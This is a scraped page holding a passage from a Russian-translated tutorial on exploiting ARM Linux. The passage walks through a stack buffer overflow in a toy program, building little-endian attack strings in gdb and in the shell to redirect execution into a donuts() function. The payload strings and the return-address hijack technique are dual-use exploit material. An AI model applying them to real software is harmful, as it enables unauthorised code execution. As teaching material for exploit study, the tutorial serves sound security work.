Переведено для codeby. Net
r11 (bp) 0xbeaca7b4 r13 (sp)
Download 0.92 Mb. Pdf ko'rish
|
эксплуатация систем arm linux AFANX
- Bu sahifa navigatsiya:
- AA BBBB CCC \xB4\xA7\xAC\xBE \xA0\xA7\xAC\xBE \x70\x84
|
r11 (bp) 0xbeaca7b4
r13 (sp) 0xbeaca7a0 r14 (lr) 0x00008470 Мы можем построить новую атакующую строку, изменив порядок байтов (little- endian), и заменив последние группы букв на эти адреса: AA BBBB CCC \xB4\xA7\xAC\xBE \xA0\xA7\xAC\xBE \x70\x84 Рис. 14: Простая строка атаки Результатом выполнения программы с новой строкой является: (gdb) r ‘printf "AABBBBCCCC\xb4\xa7\xac\xbe\xa0\xa7\xac\xbe\x70\x84"‘ Starting program: /root/exp/test ‘printf ...‘ Breakpoint 1, 0x00008428 in vuln () (gdb) step Single stepping until exit from function vuln, which has no line number information. 0x00008470 in main () (gdb) Это сработало. Функция правильно возвращается в main (). Единственная проблема возникнет при выходе из программы: кадр стека, который мы хотя и является действительным участком памяти, не совпадает с оригинальным кадром и не содержит той же информации. 31 Если мы вернемся к коду программы, то заметим функцию donuts(). Эта функция не делает ничего, кроме печати сообщения и выхода с вызовом exit(0), что позволяет избежать проблемы. Сначала мы должны узнать его адрес: (gdb) disass donuts Dump of assembler code for function donuts: 0x000083f4 0x000083f8 0x000083fc 0x00008400 0x00008404 0x00008408 0x0000840c 0x00008410 End of assembler dump. (gdb) Затем мы можем вызвать непосредственно из оболочки программу с новой строкой: root@armstation# ./test ‘printf "AABBBBCCCC\xb4\xa7\xac\ > \xbe\xa0\xa7\xac\xbe\xf4\x83"‘ Donuts... root@armstation# Программа может упасть несколько раз, но наверняка после нескольких попыток мы получим желаемый результат: выполнение donuts() и чистый выход. Download 0.92 Mb. Do'stlaringiz bilan baham: 
|